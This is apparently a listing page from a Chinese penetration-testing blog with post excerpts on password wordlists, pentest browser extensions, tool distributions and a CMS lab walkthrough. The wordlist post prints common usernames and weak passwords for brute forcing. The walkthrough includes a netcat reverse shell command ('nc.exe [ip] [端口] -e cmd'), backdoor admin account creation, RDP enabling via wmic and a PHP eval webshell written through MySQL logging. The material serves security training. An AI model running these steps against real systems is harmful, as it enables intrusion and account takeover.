首页
工具导航
留言面板
友情链接
Search
1
【红队工具】VShell v4.9.3 高级版,国产C2工具下载及使用
7,853 阅读
2
2025最新渗透测试靶场推荐,新手必练的靶场推荐
5,158 阅读
3
src平台推荐,挖SRC必须知道的25个漏洞提交平台
4,322 阅读
4
几个常见的密码字典推荐
3,392 阅读
5
全网首发!HMV全套windows机器提权,域渗透教程,2w字超详细
3,214 阅读
AI
OSCP打靶
安全服务
建站
泷羽收录
渗透学习
渗透工具
服务器
登录
Search
标签搜索
渗透测试
内网渗透
Linux
网络协议
vulnhub
SQL注入
靶场实战
提权
代理隧道
域渗透
信息收集
权限提升
WAF绕过
hackmyvm
AI安全
云安全
权限维持
红队攻击
蓝队防御
云服务
白小羽
累计撰写
188
篇文章
累计收到
0
条评论
首页
导航
工具导航
留言面板
友情链接
搜索到
91
篇与
的结果
2025-05-18
几个常见的密码字典推荐
Weakpass这是一个专门提供弱口令字典的网站,包括单词、数字、常用密码、常见手机号码等。官网地址:https://weakpass.com/SecList这是一个安全研究者和渗透测试人员常用的资源库,其中收集了一个 "Passwords" 目录,包含着许多大型的字典文件,包括弱口令字典。官网地址:https://github.com/danielmiessler/SecLists/tree/master/PasswordsProbable-Wordlists这是一个目前最大的密码字典之一,包含了 2376 个字典文件,包括密码、用户名、社会工程学素材等。现github高达8.6kstar官网地址:https://github.com/berzerk0/Probable-WordlistsCrackStation这是一个专门提供密码破解工具的服务网站,其中也提供了许多常见的弱口令字典,包括万能密码、社会工程学密码、差密码等。官网地址:https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionaries.htmKali/usr/share/wordlists/这是Kali Linux中默认的字典文件存放目录,包含了各种类型的字典文件,这些文件广泛用于密码爆破、漏洞扫描等场景。在这个目录下,你可以找到许多以.txt格式存储的字典文件,每个文件中包含一连串的单词或短语,用于密码破解时的猜测依据。/usr/share/dirb/wordlistsDirBuster 目录扫描工具的字典文件目录,用于穷举目录和文件路径。/usr/share/sqlmap/data/txtSQLMap 工具的字典文件目录,用于自动化 SQL 注入检测。/usr/share/metasploit-framework/data/wordlists/Metasploit框架中的字典文件,适用于不同类型的渗透测试活动。/usr/share/Nmap/nselib/data/Nmap 工具的字典文件目录,包含用于脚本和扫描的字典。/usr/share/wfuzz/wordlist/wfuzz 工具的字典文件目录,用于 Web 应用程序渗透测试。/usr/share/crunch/Crunch 工具的字典文件目录,用于生成自定义密码字典。自定义如果你懒得下载,那么就直接使用下面这段字典吧常见的用户名username test test1 test2 test3 testing tester admin admin1 admin2 admin3 login administrator system 123456 123456789 12345678 member guest user user1 user2 user3 root ghost yangxiu zhangwei wangwei wangfang liwei lina test admin system zhangmin lijing wangjing liuwei zhangli wangli zhangjing liqiang wangmin limin wanglei liuyang wangyan wangyong lijun zhangyong lijie zhangjie zhanglei wangqiang lijuan wangjun zhangyan zhangtao wangtao liyan wangchao liming liyong wangjuan liujie chengming chenming liumin lixia lili zhangjun wangjie zhangqiang wanggang wangping liufang liuyan liujun liping wanghui chenjing liuyong liling wangdan ligang lidan wangpeng liutao chenwei zhanghua liujing litao wangyuting lihong lichao liuli zhangpeng zhangchao wangling zhangling lihua wangfei wangying liuqiang liying lihui limei chenyong wang lifang libo yangyong wangxia wangbin lipeng zhangping zhanghui zhangyu liujuan libin wanghao chenjie wangkai chenli chenmin zhangbo zhangying yangli zhangjian wangbo zhanghong liudan li yangjing liuchao zhangjuan yangfan liuying lixue zhang wangjian liuhui liubo zhanghao zhangming chenyan zhangxia yangjie wangshuai wangxue yangjun zhangxu liugang wanghua yangmin wangning lining liubin chentao wangna zhangbin chenlong lilin wanghong yangyang wanglin chenying chenjun liuxia chenhao zhangkai chenfang yangtao yangbo chenhong liuhuan chenjuan chengang zhanglin zhangna liujia liulei liupeng wangxu zhangxue liyang wangmei liyumei liuping yangmei lifei wangliang lilei wangyu chenling zhangshuai lijian chenlin chenqiang zhaojing wangcheng chenchao chenliang liuna wangqin liuchang yangyan zhangliang liyun zhangqin liyuzhen yangchao zhangmei chenping liuhong zhaowei zhangyun zhangning yanglin gaofeng chenhua yanghua yangliu yangfang liuling chenchen wanghuan zhanglong chenbo chenlei wangyun wangfeng wangrui liqin chenpeng liufei lihao zhangdan lifeng lijia chenhui zhangfang chenxia liukai liuhua libing wangdong yangwei wanglong liuming zhoumin huangwei yanglei zhaomin chenyun likai zhangfeng lilong lishuai lixin liuyun chenbin liyuhua chenfei liuhan huangyong zhouwei wangkun lixiang zhangrui liushuai zhangfei wangyang liqiuchen mali yangling yangping liliang lirong wangbing wangming chenmei liufeng lixiuhua lidandan yangxue wangxin zhaoli huangmin yangjuan zhoujie liumei zhaojun zhaoyong liubing yangbin liwen sunwei liuyu zhangrong zhangfan zhouyong zhangkun xuwei liuqin zhoujing xumin xujing yanghong zhangwen zhouli machao wangxiuying lixiuying zhangxiuying wangxiulan liguiying wangguiying zhangxiulan zhangguiying wangyulan lixiulan zhangyulan wangguilan chenxiuying zhangguilan liguilan wangxiuzhen liyulan liuxiuying liuguiying yangxiuying lijun4 lixiuzhen zhangxin liuyulan liuguilan wangting wangyumei wangyuzhen zhangfengying lifengying liting zhangting wangyuying zhangyumei wangfengying zhangyuying lihongmei zhangqian zhangxiuzhen wangjianhua lijianhua zhangjianhua liuxin wangqian zhangyuzhen zhanglanying liqian wanglanying chenguiying wangjianguo wangjianjun wangshuzhen lichunmei wanghaiyan lidongmei wangxiurong liguizhen wangxiuyun wangguirong wangzhiqiang zhanghongmei liufengying liyuying wangxiumei wanglijuan zhangtingting wangtingting wangyuhua zhangjianguo lilanying wangguizhen lixiumei chenyulan zhangyuhua liuyumei lijianjun liuyuzhen lijianguo liguirong liuting chenxiulan zhangjianjun lixiurong zhangxiumei lixuemei zhanghaiyan wangshulan lizhiqiang litingting zhangxiurong liujianhua wanglili lihaiyan zhangguirong liuxiulan zhangzhiqiang lixiuyun lixiufang zhanglili zhangxiuyun wangshuying wangchunmei wanghongmei liguifang liuhao huangxiuying liuyuying lishuzhen wangxiufang wanglihua wangdandan wangguixiang zhangguizhen wangshuhua zhangxiufang zhangguifang zhanglijuan wuxiuying yangming liguixiang liuqian yangxiulan wangxiuhua liguizhi wangguifang zhangchunmei wangdongmei liuyuhua maxiuying zhanglihua zhangshuzhen lixiaohong wangguizhi zhangxiuhua wangjinfeng chenjianhua yangguiying lishuying chenyuying yangxiuzhen sunxiuying zhangnan liuguizhen liujianjun zhangshuying lihongxia zhaoxiuying wangjianping zhangguizhi wangguihua liutingting wanglu zhangshulan chenguilan lishuhua chenxin liujianguo liguihua wangfenglan lishulan chenxiuzhen常见的密码123456a123456 123456a 521314 111111 woaini1314 qq123456 123123 000000 1qaz2wsx 1q2w3e4r qwe123 7758521 123qwe a123123 123456aa woaini5 woaini 10020 13145 woaini123 123321 q123456 123456789 123456789a 5211314 asd123 a123456789 z123456 asd123456 a521314 aa123456 zhang123 aptx4869 123123a 1q2w3e4r5t 1qazxsw2 5 1314a 1q2w3e aini1314 31415926 q1w2e3r4 123456qq woaini521 1234qwer a111111 5252222 iloveyou abc123 110110 111111a 123456abc w123456 7758258 123qweasd 159753 qwer1234 a000000 qq123123 zxc123 123654 abc123456 123456q qq521314 12345678 000000a 456852 as123456 1314521 112233 521521 qazwsx123 zxc123456 abcd1234 asdasd 666666 love1314 QAZ123 aaa123 q1w2e3 aaaaaa a123321 123000 11111111 12qwaszx 584521314 s123456 nihao123 caonima123 zxcvbnm123 wang123 159357 1A2B3C4D asdasd123 5845 753951 147258 1123581321 1101 qq13145
2025年05月18日
3,392 阅读
0 评论
0 点赞
2025-05-18
渗透测试中16款谷歌插件最全分享
渗透测试中16款谷歌插件最全分享所有插件我都放在这个网盘链接了,自行下载即可https://pan.quark.cn/s/2b4f4823fb3b效果图如下首先打开谷歌浏览器,-》扩展程序启动开发者模式打开谷歌版本信息,获取插件路径浏览器输入chrome://version将插件压缩包全部解压放在这个路径就ok了,C:UsersAdministratorAppDataLocalGoogleChromeUser DataDefaultExtensions一个一个添加插件即可装订到状态栏,即可wappalyzer使用正常hack-tools正常使用SwitchyOmega代理工具hackbarZoomEye正常其他工具经过测试,一切正常使用往期推荐GitHub无法访问?用用这款工具,重点是不要登录!伪静态注入的几种方式【kali笔记】kali中常用的密码字典,网站推荐【JS逆向】某大型音乐平台JS逆向分析两个影响 WPS Office 的任意代码执行漏洞分析,CVE-2024-7262 和 CVE-2024-7263【流量分析】Java框架Shiro、工具利用、漏洞复现以及流量特征分析
2025年05月18日
1,755 阅读
0 评论
0 点赞
2025-05-18
车联网渗透系统
什么!车联网渗透测试系统?免责声明本站所发布的文章及工具只限交流学习,本站不承担任何责任!如有侵权,请告知我们立即删除。TranSec 操作系统TranSec OS 是基于 Ubuntu 18.04 的车联网渗透测试分发系统,主要用于车联网设备的安全评估。系统配备了数百种车联网安全专用测试工具,旨在为车联网安全从业人员解决一系列问题,如测试工具杂乱、测试环境配置复杂、工具不可用等下载由于系统体积较大,导入或安装需要一定的时间,这取决于磁盘的性能。网盘地址:https://pan.quark.cn/s/44c2fb2818c5优势账号密码:iov/root工具箱终端工具列表 (部分)以下是列出的一些工具,更多工具可以自行探索。工具名称工具介绍CANToolzCAN 分析框架Can UtilsCan 的测试工具包Scapy数据包处理工具Proxmark3PM3 客户端逻辑逻辑分析仪客户端URH无线电分析工具MQTT客户端MQTT 客户端加特工具BLE 连接工具宾步道固件解包和分析工具无 IDA专业的二进制分析工具烂摊子专业的二进制分析和漏洞扫描工具,包括自动解包和模拟吉德拉开源二进制分析工具杰布Android 反向分析工具Jadx Gui开源 Android 逆向分析工具Hcitool蓝牙连接工具Ubertool 工具软件和硬件开源蓝牙数据包捕获器Pybluez2Python 库 - 蓝牙攻击工具杀手蜂ZigBee 安全研究工具哈克射频HackRF 支持软件弗里达钩工具Gdb 多架构异构架构 gdb 分析工具Pwndbggdb 高级脚本Pwntools 工具Python 漏洞利用框架QEMU开源模拟器Qemu 系统虚拟系统模拟器固件模块套件固件修改套件固件分析工具包开源固件分析工具玻璃钢内部网络渗透工具移动SFAndroid 自动静态分析工具Burpsuite 乐队Web 测试工具优势一个开箱即用的测试环境,包括数百个用于 Internet of Vehicles 渗透测试的常用工具集。涵盖逆向工程、CAN、车载以太网、WiFi、蓝牙、云平台等安全测试永久免费更新支持,未来逐步增加针对性免费试用安恒自主研发的车联网工具和部分商业软件一个开放的操作环境,允许用户自定义和修改系统内的任何文件或安装任何程序内置了 ARM、X86、MIPS 等不同架构下的各种常用工具,如 adb、gdb、nmap、busybox 等...项目地址:https://github.com/TianWen-Lab/TranSec/
2025年05月18日
1,710 阅读
0 评论
0 点赞
2025-05-18
【渗透工具箱】灵兔宝盒-Rabbit_Treasure_Box_V1.0.1
【渗透工具箱】灵兔宝盒-Rabbit_Treasure_Box_V1.0.1介绍Rabbit_Treasure_Box_V1.0.1 是一款基于Windows操作系统的渗透工具箱,旨在提供一个开箱即用的渗透测试工具集合。该工具箱通过 Dawn Launcher 进行管理,支持一键备份和更新。它包含了脚本类工具,在Windows中启动,集成了在线安全工具,包含信息收集、漏洞利用、逆向破解、蓝队工具等类别,为渗透测试者提供了全面的参考工具。百度网盘:https://pan.baidu.com/s/1u2T9H6-3mfa1PhTNphF6uA?pwd=1212 工具大小约13G,请妥善安排下载时间。使用方法解压后到Dawn Launcher文件夹找到1.bat文件,双击会在工具箱根目录生成快捷方式,或者直接双击exe文件:Rabbit_Treasure_Box_v1.0运行也行,打开后找到备份/还原数据,点击还原,选择工具箱根目录的Data.db进行还原后即可使用。信息收集隧道代理漏洞利用密码破解圆孔权限提升蓝队工具往期推荐【RCE剖析】从0-1讲解RCE漏洞绕过,Windows与Linux/RCE漏洞绕过方式总结【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS【内网渗透】免工具,内网、域内信息收集的40种方式总结内网隐蔽扫描,Nmap高级用法比kali更稳定,工具更多,更加适合开发的操作系统-Blackarch
2025年05月18日
1,424 阅读
0 评论
0 点赞
2025-05-18
深入某CMS渗透测试:从弱口令到接管webshell
前言401验证,在网络通信和HTTP协议中,特指一种状态码——401 Unauthorized(未经授权)。当客户端尝试访问受保护的资源时,如果未能提供有效的身份验证信息,或者提供的信息不足以获得访问权限,服务器就会返回401状态码,表示请求未被授权。靶场复现弱口令123456当然也可以使用bp爆破base64解密添加迭代器,用户字典在这里添加一个冒号添加密码字典添加处理规则base64编码这里发现一个百分号的url编码,他就是我们401认证中间的冒号这里取消url编码即可然后进行爆破即可,找到一个响应为200的就是爆破成功的然后解密就好返回页面登录成功后就会得到key1进入到首页登录sql注入尝试,被验证了双引号也不行对搜索框进行xss攻击,发现对<>进行了过滤url编码,但是被转义成了script的a标签,还是以字符串的形式添加到相关搜索注册一个用户信息这里成功注册了,但是也没有alert(1)查看首页过来,也没有,修改闭合标签<strong>试试修改信息,并添加一个strong标签失败了,好像还有字符长度限制在短消息界面中尝试xss失败,没效果xss验证,被转义成了字符串</textarea><script>alert(1)</script>好家伙直接添加成功,也没有xss漏洞找到默认 织梦 后台管理地址管理员没有修改默认登录界面admin 万能密码绕过,没有效果查看端口开放信息这个端口也没有什么东西3306端口,mysql远程连接试试,拒绝远程连接robots爬虫协议/include/templets,都没发现什么东西找到头像设置界面,一句话图片马能上传了可以上传图片,但是找了好一会儿,没有找到文件包含的地方御剑目录扫描扫不出任何东西这里有一个认证,就是401认证,用普通的目录扫描工具是扫不出任何东西的Authorization: Basic YWRtaW46MTIzNDU2用burp suite扫描抓包指定好御剑的字典目录扫描路径刚刚扫描到的phpmyadmin这个错误介绍MySQL是一个流行的开放源代码关系数据库管理系统。它是许多Web应用程序的基础,例如WordPress,Magento和Drupal等。MySQL允许用户通过自己的主机或云服务器上的phpMyAdmin进行MySQL管理。然而,有时候用户可能会遇到MySQL Error # 1045 – Cannot Log in to MySQL server -> phpmyadmin错误。这篇文章将介绍这个错误,以及如何解决它。错误原因该错误通常意味着您没有权限访问MySQL服务器。在MySQL中有一个root用户,它是MySQL服务器的超级管理员。如果您尝试使用root用户登录MySQL服务器但不知道密码,或者尝试通过phpMyAdmin使用root用户但是密码错误,那么您就会遇到MySQL Error # 1045。此外,如果您使用的是不正确的用户名或密码,也会遇到此错误。弱口令root/root成功一、后台文件上传登录mysql,找到指定的数据表,查看admin密码解密admin/888888成功进入到了后台界面找到这个文件式管理器,找到key2查看这个key2上传php文件用nmap进行扫描扫出来结果为windows系统执行命令dir查看系统信息,是windows server 2008操作系统在当前uploads目录上传一个nc.exe移交cmd权限到攻击机器nc.exe [ip] [端口] -e cmddir查看是否成功查看用户权限信息,是超级管理员,那么我们就可以添加一个管理员用户添加用户,并添加到admin用户组# 添加一个用户 net user 用户名 password /add # 添加用户名到指定用户组 net localgroup administrators 用户名 /add开启远程wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1nmap扫描指定端口,查看是否开启用你刚刚添加的用户进行远程连接查看administrator目录,成功访问,获得目标服务器权限,这里环境没有配置key3,演示结束。二、日志写入phpmyadmin日志功能SHOW VARIABLES LIKE "%general%"这里我们查看日志状态是开启的,我们可以尝试写日志的方式,获取shell命令如果没有打开也可以使用如下脚本,打开日志功能SET GLOBAL GENERAL_LOG=on在上面我们看到了日志的路径,确定了本站为phpstudy搭建的,我们修改日志文件到我们的shell.php查看脚本是否存在写入日志SELECT "<?php @eval($_POST[10]); ?>"这里不要忘了添加401验证的请求头
2025年05月18日
896 阅读
0 评论
0 点赞
1
...
17
18
19